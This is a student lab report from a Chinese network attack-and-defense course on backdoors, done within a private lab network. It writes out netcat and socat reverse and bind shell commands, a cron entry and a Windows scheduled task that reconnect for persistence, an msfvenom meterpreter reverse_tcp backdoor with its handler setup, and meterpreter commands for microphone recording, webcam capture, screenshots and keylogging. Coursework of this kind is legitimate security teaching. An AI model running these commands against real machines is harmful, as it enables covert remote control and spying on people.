2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

实验内容

1.使用netcat获取主机操做Shell，cron启动
2.使用socat获取主机操做Shell, 任务计划启动
3.使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

基础问题

• 例举你能想到的一个后门进入到你系统中的可能方式？
  答：收到以银行或者学校名义给你发过来的虚假邮件，打开邮件而且下载邮件的附件以后，后门程序可能会进入你的计算机。
• 例举你知道的后门如何启动起来(win及linux)的方式？
  答：经过修改注册表设置为开机自启动；进入挂马网站；下载一些有恶意程序绑定的软件。
• Meterpreter有哪些给你映像深入的功能？
  答：能够不用经过用户登陆来访问计算机，而且随意进行开启摄像头，录制音频等操做。

• 如何发现本身有系统有没有被安装后门？
  答：1.首先必须开启防火墙，并且防火墙对与某些危险操做的提示要仔细查看，不能疏忽。2.能够下载专业的杀毒软件(不要下载一些流氓软件如360)，进行按期检查电脑。3.能够检测某些不经常使用的端口是否长时间开启，若是长时间开启说明电脑有必定的概率被植入了后门或者是病毒。

  实验过程

  1.使用netcat获取主机操做Shell，cron启动

1.windows下得到一个linux shell

1.在Linux中使用ifconfig查看Linux的ip地址

2.在Windows中使用ipconfig查看本机ip地址

3.windows打开监听：ncat.exe -l -p 5235，Linux反弹链接win：nc 192.168.1.101 5235 -e /bin/sh，而且在Windows cmd下使用ls命令查看是否成功。

2.Linux 下得到Windows的cmd程序

1.Linux运行监听指令：nc -l -p 5235，Windows反弹链接Linux：ncat.exe -e cmd.exe 192.168.245.128 5235，在Linux shell下使用dir命令。

3.在Linux与Windows之间进行数据传送

1.Windows下监听端口：ncat.exe -l -p 5235，,Linux下链接到Windows的端口：ncat 192.168.1.101 5235，创建链接以后，就能够传输数据：

2.使用socat获取主机操做Shell, 任务计划启动

1.使用netcat获取主机操做Shell，cron启动

1.Windows中使用ncat.exe -l 5235监听5235端口
2.在linux中，使用crontab -e指令编辑一条定时任务，选择编辑器时选择3，在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh（每一个小时的第57分钟反向链接Windows的5235端口）

3.:wq保存退出配置即生效，可经过crontab -l查看：

4.在系统时间到57分钟，就会在Windows中监听的cmd中发现得到了Linux shell

2.使用socat获取主机操做Shell, 任务计划启动

1.win7系统中鼠标右击计算机：计算机管理->系统工具->任务计划程序->建立任务

2.常规中填写任务名称如：20165235。

3.触发器-新建新建触发器，（按照图中步骤进行）

4.点击操做，将2操做所指的改成 启动程序.

5.导入socat.exe的路径，并添加参数：tcp-listen:5235 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5235，同时把cmd.exe的stderr重定向到stdout上)

6.建立完成以后，按Windows+L快捷键锁定计算机，再次打开，运行以前建立的任务。

7.在Linux shell中输入socat - tcp:192.168.1.101:5235：

3.使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe,生成后门程序20165235_backdoor.exe

2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe

3.Linux中输入nc 192.168.1.101 5235 < 20165235_backdoor.exe。传输成功而且在Windows的ncat文件夹下查看后门程序。

4.再打开新的shell，而且使用msfconsole进入msf控制台：

5.输入use exploit/multi/handler：
6.使用和生成后门程序时相同的payload：set payload windows/meterpreter/reverse_tcp：
7.设置ip：set LHOST 192.168.245.128
9.设置端口：set LPORT 5235
10.使用exploit开始监听
11.在Windows cmd 中相应文件夹中执行：20165235_backdoor.exe，Linux得到Windows主机的链接，而且获得了远程控制的shell：

4.使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.在以上的操做之上，使用record_mic能够截获一段音频：


2.使用webcam_snap可使用摄像头拍照：

3.使用creenshot能够进行截屏：

4.使用keyscan_start 记录下击键的过程，使用keyscan_dump读取击键的记录：

实验中遇到的问题

1.错误一：在进行第一个实验时出现以下错误：

解决方法：在Linux使用ifconfig时出现不少地址，我很随意的填上去了一个，通过我仔细查看，将192.168.245.130写入运行成功。

2.错误：在使用crontab -e指令编辑一条定时任务时，发现win7端没有监听到Linux的shell

解决方法：由于在底部加入指令时没有将#取除掉。

实验总结与体会

经过本次实验我首先明白了什么是后门。（后门程序通常是指那些绕过安全性控制而获取对程序或系统访问权的程序方法）。同时也学会了后门的基本原理，按照学长学姐以及同窗的博客的指导下完成实验，学会了使用多种后门工具，同时也学会了如何防范别人对计算机的后门植入。在之后的学习生活中要注意网上安全，留意恶意程序。本此实验也有必定的趣味性，在完成后门植入后会有些许的成就感。